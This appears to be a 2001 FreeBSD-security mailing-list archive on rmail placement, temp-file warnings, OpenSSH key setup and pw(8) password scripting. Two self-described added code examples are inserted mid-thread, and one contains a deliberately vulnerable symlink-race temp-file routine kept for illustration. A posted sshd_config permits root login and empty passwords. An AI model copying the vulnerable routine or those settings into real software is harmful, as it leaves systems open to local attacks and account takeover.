> ># uname -r
> >4.3-STABLE
> ># ldd /bin/rmail
> >/bin/rmail:
> >        libc.so.4 => /usr/lib/libc.so.4 (0x28067000)
>
> man rmail:
>
> BUGS
>      Rmail should not reside in /bin.

Oh well, I didn't catch this one: NO_SENDMAIL & NO_UUCP in my /etc/make.conf :)

But yes, this is apparently a documented bug - rmail is not part of the boot
process, there is no real need for it in 'emergency' situations when /usr
is not mounted yet, so no, it should not really reside in /bin.

G'luck,
Peter

--
No language can express every thought unambiguously, least of all this one.
From owner-freebsd-security Fri Jun 8 4:47:27 2001
From: Sheldon Hearn
To: Buliwyf McGraw
Cc: Michael Tang Helmeste, security@FreeBSD.ORG
Subject: Re: Unsafe Message
In-reply-to: Your message of "Thu, 07 Jun 2001 21:30:16 EST."
Date: Fri, 08 Jun 2001 13:46:43 +0200
Message-ID: <3721.992000803@axl.seasidesoftware.co.za>

On Thu, 07 Jun 2001 21:30:16 EST, Buliwyf McGraw wrote:

> But I am not sure about how to improve the libraries... I mean, is there
> a patch or something for this specific error???
>
> Thanks for any "smart" answer.

The message is really there for people who know what to do about it. If
you don't know how to patch the offending code so that it uses less
guessable names for its temporary files, don't worry about the warning.

Ciao,
Sheldon.

From owner-freebsd-security Fri Jun 8 7:46:15 2001
Date: Fri, 8 Jun 2001 10:46:00 -0400 (EDT)
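For the tmpnam()/mkstemp() thread above (Buliwyf McGraw's question and Sheldon Hearn's reply), here is an added example, not code from the thread or from the library that emitted the warning. It shows the two-step name-then-open pattern the linker is warning about, kept for illustration and never called, next to the single-call mkstemp() replacement and the O_CREAT|O_EXCL check to use when the file name has to be fixed. The directory "/tmp" and the "report." prefix are assumptions of the example:

```c
/* Added example (not from the thread): the name-then-open pattern behind
 * the linker warning, next to the mkstemp() replacement. The directory and
 * the "report." prefix are assumptions of the example. */
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700   /* mkstemp(), fchmod() under strict -std= modes */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The problem: tmpnam()-style code picks a name, then opens it in a second
 * step. Between the two, another local user can plant a symlink at that
 * name (it is as guessable as "report.<pid>"), and the open() follows it.
 * Kept for illustration only; never called. */
int unsafe_temp_open(const char *dir)
{
    char path[256];
    snprintf(path, sizeof path, "%s/report.%ld", dir, (long)getpid());
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);   /* no O_EXCL */
}

/* The fix: mkstemp() replaces XXXXXX with a random suffix and creates the
 * file with O_CREAT|O_EXCL in one call, so the name is neither guessable
 * nor already present. The caller keeps using the fd and never reopens the
 * file by name. Returns the fd or -1; path_out receives the name so the
 * caller can unlink() it later. */
int safe_temp_open(const char *dir, char *path_out, size_t path_len)
{
    int fd;
    if (snprintf(path_out, path_len, "%s/report.XXXXXX", dir) >= (int)path_len)
        return -1;
    fd = mkstemp(path_out);
    if (fd < 0)
        return -1;
    if (fchmod(fd, 0600) < 0) {   /* older libcs created it 0666 & ~umask */
        close(fd);
        unlink(path_out);
        return -1;
    }
    return fd;
}

/* When the name must be fixed (a lock or spool file), O_CREAT|O_EXCL makes
 * open() fail with EEXIST if anything, a symlink included, already sits at
 * that path, instead of following it. */
int safe_open_exact(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Creates a temp file in dir and checks it is a regular file, mode 0600,
 * with a single link. Returns 1 if so, 0 if not, -1 on error. */
int temp_file_is_private(const char *dir)
{
    char path[256];
    struct stat st;
    int fd = safe_temp_open(dir, path, sizeof path), ok;
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) < 0) {
        close(fd);
        unlink(path);
        return -1;
    }
    ok = S_ISREG(st.st_mode) && (st.st_mode & 07777) == 0600 && st.st_nlink == 1;
    close(fd);
    unlink(path);
    return ok;
}

/* Returns 1 if safe_open_exact() refuses a path that already exists. */
int exact_open_refuses_existing(const char *dir)
{
    char path[256];
    int fd = safe_temp_open(dir, path, sizeof path), refused;
    if (fd < 0)
        return -1;
    refused = safe_open_exact(path) < 0 && errno == EEXIST;
    close(fd);
    unlink(path);
    return refused;
}

int main(void)
{
    printf("private temp file: %d, exact open refuses existing: %d\n",
           temp_file_is_private("/tmp"), exact_open_refuses_existing("/tmp"));
    return 0;
}
```

Patching a library to silence the warning means replacing each tmpnam()/tempnam() plus open()/fopen() pair with mkstemp() and fdopen() on the returned descriptor; where the code really needs a fixed name, the O_EXCL form above is the minimum.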
From: Garrett Wollman
Message-Id: <200106081446.KAA36576@khavrinen.lcs.mit.edu>
To: Peter Pentchev
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: root & toor
In-Reply-To: <20010608090357.B12983@ringworld.oblivion.bg>
References: <20010607212013.B4738@anarchy.com> <20010608090357.B12983@ringworld.oblivion.bg>

< said:

> But yes, this is apparently a documented bug - rmail is not part of the boot
> process, there is no real need for it in 'emergency' situations when /usr
> is not mounted yet, so no, it should not really reside in /bin.

Unfortunately, as with /etc/rmt, it is part of a protocol the client
implementations of which we do not control.

-GAWollman

From owner-freebsd-security Fri Jun 8 7:47:13 2001
From: "Misha Kamushkin" To: freebsd-security@freebsd.org Subject: openssh auth. problem Date: Fri, 08 Jun 2001 07:47:03 -0700 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 08 Jun 2001 14:47:03.0651 (UTC) FILETIME=[E1A6E330:01C0F029] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org hello, i think i tried everything under the sun to get this to work but with no results. i need to get ssh to work without prompting me for a password. i created id_dsa and id_dsa.pub with ssh-keygen. then i export the key with ssh-keygen -x. after that i copied the exported key to my server and renamed it known_hosts2 and i also tried athorized_keys2. i have enable hostbasedauthentication on both client and sever config files. here's client conf file: [root@ber ssh2]# cat ssh_config Host 1.1.1.1 ForwardAgent no ForwardX11 yes HostbasedAuthentication yes PreferredAuthentications hostbased,password # RhostsAuthentication no RhostsRSAAuthentication yes # RSAAuthentication yes # PasswordAuthentication yes FallBackToRsh no # UseRsh no # BatchMode no # CheckHostIP yes # StrictHostKeyChecking yes # IdentityFile ~/.ssh/known_hosts2 IdentityFile ~/.ssh/id_dsa # IdentityFile ~/.ssh/id_rsa Port 22 Protocol 2 Cipher blowfish # EscapeChar ~ here's server config file: [root@lit ssh2]# cat sshd_config Port 22 Protocol 2 #ListenAddress 0.0.0.0 #ListenAddress :: HostKey /etc/ssh2/ssh_host_key HostKey /etc/ssh2/ssh_host_rsa_key HostKey /etc/ssh2/ssh_host_dsa_key ServerKeyBits 768 LoginGraceTime 600 KeyRegenerationInterval 3600 PermitRootLogin yes # # Don't read ~/.rhosts and ~/.shosts files IgnoreRhosts yes # Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication #IgnoreUserKnownHosts yes StrictModes yes X11Forwarding no X11DisplayOffset 10 PrintMotd yes #PrintLastLog no KeepAlive yes # Logging 
SyslogFacility AUTH
LogLevel INFO
#obsoletes QuietMode and FascistLogging
RhostsAuthentication no
#
# For this to work you will also need host keys in /etc/ssh2/ssh_known_hosts
#RhostsRSAAuthentication yes
# similar for protocol version 2
HostbasedAuthentication yes
# RSAAuthentication yes
# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication yes
PermitEmptyPasswords yes
# Uncomment to disable s/key passwords
#ChallengeResponseAuthentication no
# Uncomment to enable PAM keyboard-interactive authentication
# Warning: enabling this may bypass the setting of 'PasswordAuthentication'
#PAMAuthenticationViaKbdInt yes
# To change Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#AFSTokenPassing no
#KerberosTicketCleanup no
# Kerberos TGT Passing does only work with the AFS kaserver
#KerberosTgtPassing yes
#CheckMail yes
#UseLogin no
#MaxStartups 10:30:60
#Banner /etc/issue.net
#ReverseMappingCheck yes
Subsystem sftp /usr/local//libexec/sftp-server

here's the output:

[root@ber ssh2]# ssh 2.2.2.2 -v
OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090581f
debug1: Reading configuration data /etc/ssh2/ssh_config
debug1: Seeding random number generator
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: restore_uid
debug1: ssh_connect: getuid 0 geteuid 0 anon 1
debug1: Connecting to 2.2.2.2 [2.2.2.2] port 22.
debug1: temporarily_use_uid: 0/0 (e=0)
debug1: restore_uid
debug1: temporarily_use_uid: 0/0 (e=0)
debug1: restore_uid
debug1: Connection established.
debug1: read PEM private key done: type DSA
debug1: read PEM private key done: type RSA
debug1: identity file /root/.ssh/identity type -1
debug1: identity file /root/.ssh/id_rsa type -1
debug1: identity file /root/.ssh/id_dsa type 2
debug1: Remote protocol version 2.0, remote software version OpenSSH_2.9p1
debug1: match: OpenSSH_2.9p1 pat ^OpenSSH
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_2.9p1
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: server->client aes128-cbc hmac-md5 none
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP
debug1: dh_gen_key: priv key bits set: 137/256
debug1: bits set: 1039/2049
debug1: SSH2_MSG_KEX_DH_GEX_INIT sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
debug1: Host '2.2.2.2' is known and matches the RSA host key.
debug1: Found key in /root/.ssh/known_hosts2:1
debug1: bits set: 1022/2049
debug1: ssh_rsa_verify: signature correct
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: done: ssh_kex2.
debug1: send SSH2_MSG_SERVICE_REQUEST
debug1: service_accept: ssh-userauth
debug1: got SSH2_MSG_SERVICE_ACCEPT
debug1: authentications that can continue: publickey,password,keyboard-interactive,hostbased
debug1: next auth method to try is publickey
debug1: try privkey: /root/.ssh/identity
debug1: try privkey: /root/.ssh/id_rsa
debug1: try pubkey: /root/.ssh/id_dsa
debug1: authentications that can continue: publickey,password,keyboard-interactive,hostbased
debug1: next auth method to try is password
root@2.2.2.2's password:

what am i doing wrong? can somebody bring some light on this. what's the
correct step by step configuration?
thanks in advance.
From owner-freebsd-security Fri Jun 8 7:57:05 2001
Message-ID: <3B20E7A4.21722896@centtech.com>
Date: Fri, 08 Jun 2001 09:56:36 -0500
From: Eric Anderson
Organization: Centaur Technology
To: freebsd-questions@freebsd.org
Cc: freebsd-security@freebsd.org
Subject: gif interfaces don't count packets?

After setting up a few VPN's with IPSEC using the gif interfaces, I found
that the gif interfaces don't always count packets/bytes to/from the
interface. It appears it only counts the packets if it is destined to or
has a source from an IP that has been ifconfig'ed to the gif interface
(I used netstat -bi to show this data). Any data passing through the
gif/IPSEC tunnel should increase the counters, right? What am I missing
here?

Oh, incidentally, I'm using 4.2 Release for all my FreeBSD VPN boxes at
this point, with Racoon as my key exchanger.

Eric

--
-------------------------------------------------------------------------------
Eric Anderson      anderson@centtech.com      Centaur Technology      (512) 418-5792
For every complex problem, there is a solution that is simple, neat, and wrong.
-------------------------------------------------------------------------------

From owner-freebsd-security Fri Jun 8 7:57:20 2001
From: "Antoine Beaupre (LMC)"
Organization: LMC, Ericsson Research Canada
To: Garrett Wollman
Cc: Peter Pentchev, freebsd-security@FreeBSD.ORG
Message-ID: <3B20E7A3.DBC587BB@lmc.ericsson.se>
Date: Fri, 08 Jun 2001 10:56:35 -0400
Subject: Bug: rmail in /bin (was: root & toor)

Garrett Wollman wrote:
>
> < said:
>
> > But yes, this is apparently a documented bug - rmail is not part of the boot
> > process, there is no real need for it in 'emergency' situations when /usr
> > is not mounted yet, so no, it should not really reside in /bin.
>
> Unfortunately, as with /etc/rmt, it is part of a protocol the
> client implementations of which we do not control.

IIRC, /etc/rmt is a symlink. Why not the same for rmail?

$2%
A.

--
Semantics is the gravity of abstraction.

From owner-freebsd-security Fri Jun 8 8:08:36 2001
Date: Fri, 8 Jun 2001 11:12:57 -0400 (EDT)
From: Ralph Huntington
To: "Karsten W. Rohrbach"
Cc: David Miner, edwin chan, Olivier Nicole, freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted passwords

> correct me if i am just stupid, but i don't get the point
> echo -n passW0Rd | pw -u testuser -h 1
> sets the password of "testuser" to "passW0Rd", storing it in the auth
> system you prefer in encrypted form. am i missing something?

Dang! I coulda had a V-8! I *knew* that other thing was inelegant.
Oh but not -h 1, rather -h 0, as in

echo -n passW0Rd | pw -u testuser -h 0

or other handy varieties, e.g.,

echo -n 'Better\!PWD' | pw -u testuser -m -s /sbin/nologin -h 0

Thanks Karsten. -=r=-

From owner-freebsd-security Fri Jun 8 8:19:53 2001
Date: Fri, 8 Jun 2001 17:20:09 +0200
From: "Karsten W. Rohrbach"
To: Ralph Huntington
Cc: David Miner, edwin chan, Olivier Nicole, freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted passwords
Message-ID: <20010608172009.F3071@mail.webmonster.de>

Ralph Huntington(rjh@mohawk.net)@2001.06.08 11:12:57 +0000:
> > correct me if i am just stupid, but i don't get the point
> > echo -n passW0Rd | pw -u testuser -h 1
> > sets the password of "testuser" to "passW0Rd", storing it in the auth
> > system you prefer in encrypted form. am i missing something?
>
> Dang! I coulda had a V-8! I *knew* that other thing was inelegant.
> Oh but not -h 1, rather -h 0, as in
>
> echo -n passW0Rd | pw -u testuser -h 0

doh! sure, holy madonna of the sacred typo, save my soul ;-)

>
> or other handy varieties, e.g.,
>
> echo -n 'Better\!PWD' | pw -u testuser -m -s /sbin/nologin -h 0
>
> Thanks Karsten. -=r=-
>
>

--
> CS Students do it in the pool.
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46

From owner-freebsd-security Fri Jun 8 9:34:12 2001
Date: Fri, 8 Jun 2001 12:33:50 -0400
To: freebsd-security@freebsd.org
Subject: RE: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts
From: Dan Pelleg
Message-Id: <20010608163410.7BF2137B401@hub.freebsd.org>

I was trying this:

  3) To patch your present system: download the relevant patch from the
  below location, and execute the following commands as root:

But it seems that:

1.
  # cd /usr/src/lib/libc

should be /usr/src/lib/libc/gen, right?

(now in which directory do I "make depend && make all install"?)

2.
  # cd /usr/src/usr.bin/chgrp

Probably /usr/src/usr.sbin/chown/ is a better choice.

From owner-freebsd-security Fri Jun 8 9:38:28 2001
Date: Fri, 8 Jun 2001 19:37:02 +0300
From: Peter Pentchev
To: Dan Pelleg
Cc: freebsd-security@freebsd.org
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts
Message-ID: <20010608193702.E535@ringworld.oblivion.bg>

On Fri, Jun 08, 2001 at 12:33:50PM -0400, Dan Pelleg wrote:
>
> I was trying this:
> 3) To patch your present system: download the relevant patch from the
> below location, and execute the following commands as root:
>
> But it seems that:
> 1.
> # cd /usr/src/lib/libc
>
> should be /usr/src/lib/libc/gen, right?
>
> (now in which directory do I "make depend && make all install"?)

No, it shouldn't.
src/lib/libc/gen contains only part of the libc sources - the so-called
'generic' functions. In this case, you need to rebuild the whole of libc -
libc/gen only builds several object files, not a whole library.

> 2.
> # cd /usr/src/usr.bin/chgrp
>
> Probably /usr/src/usr.sbin/chown/ is a better choice.

Yes, this one is valid :)

G'luck,
Peter

--
This sentence no verb.
From owner-freebsd-security Fri Jun 8 9:45:29 2001
Date: Fri, 8 Jun 2001 12:44:49 -0400
To: freebsd-security@freebsd.org
Subject: RE: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts
From: Dan Pelleg
Message-Id: <20010608164526.4F02437B405@hub.freebsd.org>

> > But it seems that:
> > 1.
> > # cd /usr/src/lib/libc
> >
> > should be /usr/src/lib/libc/gen, right?
> >
> > (now in which directory do I "make depend && make all install"?)
>
> No, it shouldn't.
> src/lib/libc/gen contains only part of the libc sources - the so-called
> 'generic' functions. In this case, you need to rebuild the whole of libc -
> libc/gen only builds several object files, not a whole library.

The patch didn't work for me until I cd-ed to .../gen

Either the patch or the instructions should be fixed.

From owner-freebsd-security Fri Jun 8 9:46:25 2001
Date: Fri, 8 Jun 2001 12:47:36 -0400 (EDT)
From: David Miner
To: "Karsten W. Rohrbach"
Cc: Ralph Huntington, edwin chan, Olivier Nicole
Subject: Re: Encrypted passwords

Long way around the barn, but this worked:

`echo -n '$pwd1[$a]' | pw useradd -n $name -c $fullname -d $userhome -s $s -m -h 0`;

I replaced all of the encrypted stuff and simplified the program. It is
still a mystery as to why it works in adduser, why the encrypted password
looks the same as program output and under vipw, but the user cannot login
with it. Oh well.

Thanks to everyone who helped!!!

End of thread.

David

---------------------------------------------------------------------
David R. Miner                     miner@lis.fsu.edu
Systems Integrator                 voice: 850-644-8107
School of Information Studies      fax: 850-644-6253
Florida State University           Tallahassee, FL 32306-2100

From owner-freebsd-security Fri Jun 8 9:56:32 2001
Date: Fri, 8 Jun 2001 09:56:10 -0700 (PDT)
From: Dan Busarow
To: David Miner
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted passwords

On Jun 8, David Miner wrote:
> Long way around the barn, but this worked:
>
> `echo -n '$pwd1[$a]' | pw useradd -n $name -c $fullname -d $userhome -s $s
> -m -h 0`;
>
> I replaced all of the encrypted stuff and simplified the program. It is
> still a mystery as to why it works in adduser, why the encrypted password
> looks the same as program output and under vipw, but the user cannot login
> with it.

Did you forget to rebuild the password DB? pwd_mkdb

Dan
--
Dan Busarow                                          949 443 4172
Dana Point Communications, Inc.                      dan@dpcsys.com
Dana Point, California      83 09 EF 59 E0 11 89 B4 8D 09 DB FD E1 DD 0C 82

From owner-freebsd-security Fri Jun 8 10:20:06 2001
Message-ID: <3B210940.A6DFBAB2@globalstar.com>
Date: Fri, 08 Jun 2001 10:20:00 -0700
From: "Crist Clark"
Organization: Globalstar LP
To: Misha Kamushkin
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: openssh auth. problem

Misha Kamushkin wrote:
>
> hello,
>
> i think i tried everything under the sun to get this to work but
> with no results. i need to get ssh to work without prompting me for a
> password. i created id_dsa and id_dsa.pub with ssh-keygen. then i export
> the key with ssh-keygen -x. after that i copied the exported key to my
> server and renamed it known_hosts2 and i also tried athorized_keys2. i
> have enable hostbasedauthentication on both client and sever config
> files.

[snip]

> what am i doing wrong. can somebody bring some light on this. what's the
> correct step by step configuration.
> thanks in advance.

You seem to be using OpenSSH at both ends (server and client), correct?
Why are you using the SSH2-compatible public key generated with '-x?'
You should be using the OpenSSH-compatible public key, id_dsa.pub, and
putting it in the remote authorized_keys2 file (not known_hosts2 or
athorized_keys2).

--
Crist J. Clark                           Network Security Engineer
crist.clark@globalstar.com               Globalstar, L.P.
(408) 933-4387                           FAX: (408) 933-4926
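Crist's diagnosis, worked through as an added example (not code from the thread or from OpenSSH): sshd's authorized_keys parser accepts only lines of the form "keytype base64-blob [comment]", which is exactly what id_dsa.pub contains, whereas `ssh-keygen -x` (renamed `-e` in later releases) writes the SECSH block format, so an authorized_keys2 file made from that export yields zero usable keys and the client falls through to password authentication, as in the debug output above. The DSA numbers are toy values constructed for illustration, not a real key; the parser mirrors sshd's checks rather than being its code.

```python
"""Why a `ssh-keygen -x` export does not work as an authorized_keys2 file.

Added example, not from the mailing-list post or from OpenSSH itself.
The DSA parameters are toy values, NOT a real key.
"""
import base64
import struct
import textwrap

KNOWN_TYPES = {"ssh-dss", "ssh-rsa"}


def ssh_string(data: bytes) -> bytes:
    """RFC 4253 'string': 4-byte big-endian length prefix, then the bytes."""
    return struct.pack(">I", len(data)) + data


def ssh_mpint(n: int) -> bytes:
    """RFC 4253 'mpint' for n >= 0: minimal big-endian, 0x00 prefix if high bit set."""
    if n == 0:
        return ssh_string(b"")
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    if raw[0] & 0x80:
        raw = b"\x00" + raw
    return ssh_string(raw)


def build_dss_blob(p: int, q: int, g: int, y: int) -> bytes:
    """Public ssh-dss blob: string "ssh-dss" followed by mpint p, q, g, y."""
    return ssh_string(b"ssh-dss") + ssh_mpint(p) + ssh_mpint(q) + ssh_mpint(g) + ssh_mpint(y)


def read_string(buf: bytes, off: int):
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    if off + n > len(buf):
        raise ValueError("truncated ssh string")
    return buf[off:off + n], off + n


def blob_key_type(blob: bytes) -> str:
    """The key type is the first string inside the blob."""
    name, _ = read_string(blob, 0)
    return name.decode("ascii")


def to_openssh_line(blob: bytes, comment: str) -> str:
    """The format id_dsa.pub is written in (and authorized_keys expects)."""
    return f"{blob_key_type(blob)} {base64.b64encode(blob).decode()} {comment}"


def to_secsh_block(blob: bytes, comment: str) -> str:
    """The SECSH/ssh.com block format that `ssh-keygen -x` writes."""
    lines = ["---- BEGIN SSH2 PUBLIC KEY ----", f'Comment: "{comment}"']
    lines += textwrap.wrap(base64.b64encode(blob).decode(), 70)
    lines.append("---- END SSH2 PUBLIC KEY ----")
    return "\n".join(lines) + "\n"


def parse_authorized_keys_line(line: str):
    """Return (keytype, blob) for an OpenSSH public-key line, else None.

    Mirrors sshd's checks: skip blanks and comments, require a known type and
    a base64 field, and the declared type must match the type inside the blob.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split(None, 2)
    if len(fields) < 2 or fields[0] not in KNOWN_TYPES:
        return None
    try:
        blob = base64.b64decode(fields[1], validate=True)
        if blob_key_type(blob) != fields[0]:
            return None
    except (ValueError, UnicodeDecodeError, struct.error):
        return None
    return fields[0], blob


def load_authorized_keys(text: str):
    """Every key sshd would accept from an authorized_keys(2) file body."""
    return [k for k in map(parse_authorized_keys_line, text.splitlines()) if k]


def secsh_to_openssh(text: str, comment: str = "imported") -> str:
    """What `ssh-keygen -X` (later -i) does: unwrap a SECSH block into one line."""
    inside, b64 = False, []
    for line in text.splitlines():
        if line.startswith("---- BEGIN SSH2 PUBLIC KEY"):
            inside = True
        elif line.startswith("---- END SSH2 PUBLIC KEY"):
            break
        elif inside and ":" not in line:      # header lines contain ':', base64 never does
            b64.append(line.strip())
    return to_openssh_line(base64.b64decode("".join(b64), validate=True), comment)


# Constructed sample: toy DSA numbers (p=23, q=11, g=4, y=4^5 mod 23), not a real key.
TOY_BLOB = build_dss_blob(p=23, q=11, g=4, y=12)
OPENSSH_PUB = to_openssh_line(TOY_BLOB, "root@ber")   # what id_dsa.pub looks like
SECSH_PUB = to_secsh_block(TOY_BLOB, "root@ber")      # what `ssh-keygen -x` writes

if __name__ == "__main__":
    print("keys accepted from id_dsa.pub     :", len(load_authorized_keys(OPENSSH_PUB)))
    print("keys accepted from the -x export  :", len(load_authorized_keys(SECSH_PUB)))
    print("import restores the same line     :", secsh_to_openssh(SECSH_PUB, "root@ber") == OPENSSH_PUB)
```

The same blob is carried by both files; only the framing differs, which is why appending id_dsa.pub to the remote authorized_keys2 works while copying the exported file does not.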
From owner-freebsd-security Fri Jun 8 11:57:17 2001
Date: Wed, 6 Jun 2001 12:53:21 +0200
From: Neil Blakey-Milner
Organization: iTouch Labs
To: Andreas Haugsnes
Cc: security@freebsd.org
Subject: Re: [fwd] SSH allows deletion of other users files...
Message-ID: <20010606125321.A56634@mithrandr.moria.org>

On Wed 2001-06-06 (12:48), Andreas Haugsnes wrote:
> I've tested it with FreeBSD 4.3, and I have not found this bug
> to apply.

Are you using X forwarding? (ie, ssh -X)

Neil
--
Neil Blakey-Milner
nbm@mithrandr.moria.org

From owner-freebsd-security Fri Jun 8 12:15:17 2001
Message-Id: <200106081914.f58JEq556483@orthanc.ab.ca>
From: Lyndon Nerenberg
Organization: The Frobozz Magic Homing Pigeon Company
To: Garrett Wollman
Cc: Peter Pentchev, freebsd-security@FreeBSD.ORG
Subject: /bin/rmail (was: root & toor)
Date: Fri, 08 Jun 2001 13:14:52 -0600

>>>>> "Garrett" == Garrett Wollman writes:

    Garrett> Unfortunately, as with /etc/rmt, it is part of a protocol
    Garrett> the client implementations of which we do not control.

That's not true. The convention for executing rmail has always[1] been
'uux system!rmail'. It's up to the remote uuxqt to decide what path it's
going to use when searching for executables. In FreeBSD, uuxqt searches
in /bin, /usr/bin, /usr/local/bin by default. So, moving rmail into
/usr/bin won't break the traditional uuxqt execution environment.

The only other issue is local execution of /bin/rmail by programs other
than uuxqt. A grep through the source tree doesn't show any other program
invoking rmail. And I would argue that rmail shouldn't be invoked by
anything other than uuxqt. Its presence in /bin is an artifact of there
being no concept of libexec directories when UUCP was invented.

In fact, I would go so far as to say we should create /usr/libexec/uuxqt/,
move rmail into it, and prepend /usr/libexec/uuxqt to the default uuxqt
execution search path.

--lyndon

[1] Well, it's been this way for the 17 years I've been using UUCP.
From owner-freebsd-security Fri Jun 8 12:19:59 2001
Date: Fri, 8 Jun 2001 19:13:04 +0200
From: Gerhard Sittig
Organization: System Defenestrators Inc.
To: freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted passwords
Message-ID: <20010608191304.N17514@speedy.gsinet>

On Thu, Jun 07, 2001 at 16:33 -0400, David Miner wrote:
> On Thu, 7 Jun 2001, Karsten W. Rohrbach wrote:
>
> > correct me if i am just stupid, but i don't get the point
> > echo -n passW0Rd | pw -u testuser -h 1
> > sets the password of "testuser" to "passW0Rd", storing it in
> > the auth system you prefer in encrypted form. am i missing
> > something?
> >
> > /k
> >
> No, I don't think you have missed the point. Using echo and
> piping it into pw would work. I am trying to read the cleartext
> password from a file and, since I haven't figured out how the
> pw file descriptor works, encrypt it and use the chpass utility
> to get it into /etc/passwd.

Why are you trying to do this manually? It's as simple as

echo "$PASSWORD" | pw usermod -n $USERNAME -h 0

(this is exactly what you can read in "man pw"). There shouldn't be much
of a problem in any scripting language to pipe the cleartext password
into the pw(8) command after creating the user (or during creating it,
but I didn't test this -- while changing an existing user's password
went fine here, as well as disabling it by means of "-h -").

> It looks like it encrypts correctly, but the user cannot log in
> with that password. So something must be wrong with the
> encryption system or the way I have put the pieces together.

The problem probably is that you want to reinvent existing functionality.
:) Just use what's at your hands!

virtually yours   82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig    true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
     If you don't understand or are scared by any of the above
             ask your parents or an adult to help you.

From owner-freebsd-security Fri Jun 8 12:28:31 2001
Date: Fri, 8 Jun 2001 15:27:58 -0400 (EDT)
From: Rob Simmons
To: Neil Blakey-Milner
Cc: Andreas Haugsnes, security@FreeBSD.ORG
Subject: Re: [fwd] SSH allows deletion of other users files...

With X forwarding on in /etc/ssh/sshd_config:
X11Forwarding yes

and using
ssh -X @

I don't see any ssh files in /tmp. Does this bug apply to FreeBSD's
version of OpenSSH?

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Wed, 6 Jun 2001, Neil Blakey-Milner wrote:

> On Wed 2001-06-06 (12:48), Andreas Haugsnes wrote:
> > I've tested it with FreeBSD 4.3, and I have not found this bug
> > to apply.
>
> Are you using X forwarding? (ie, ssh -X)
>
> Neil
> --
> Neil Blakey-Milner
> nbm@mithrandr.moria.org
>

From owner-freebsd-security Fri Jun 8 12:37:00 2001
Message-Id:
<200106081936.f58Jaq556650@orthanc.ab.ca> From: Lyndon Nerenberg Organization: The Frobozz Magic Homing Pigeon Company Cc: Garrett Wollman , Peter Pentchev , freebsd-security@FreeBSD.ORG Subject: Re: /bin/rmail (was: root & toor) In-reply-to: Your message of "Fri, 08 Jun 2001 13:14:52 MDT." <200106081914.f58JEq556483@orthanc.ab.ca> Date: Fri, 08 Jun 2001 13:36:52 -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "Lyndon" == Lyndon Nerenberg writes: Lyndon> The only other issue is local execution of /bin/rmail by Lyndon> programs other than uuxqt. A grep through the source tree Lyndon> doesn't show any other program invoking rmail. And of course I meant "other than sendmail." --lyndon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 12:37:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 617D837B403 for ; Fri, 8 Jun 2001 12:35:44 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 56078 invoked by uid 1000); 8 Jun 2001 19:34:00 -0000 Date: Fri, 8 Jun 2001 22:34:00 +0300 
From: Peter Pentchev
To: Rob Simmons
Cc: Neil Blakey-Milner, Andreas Haugsnes, security@FreeBSD.ORG
Subject: Re: [fwd] SSH allows deletion of other users files...
Message-ID: <20010608223400.C54030@ringworld.oblivion.bg>
Mail-Followup-To: Rob Simmons, Neil Blakey-Milner, Andreas Haugsnes, security@FreeBSD.ORG
References: <20010606125321.A56634@mithrandr.moria.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from rsimmons@wlcg.com on Fri, Jun 08, 2001 at 03:27:58PM -0400
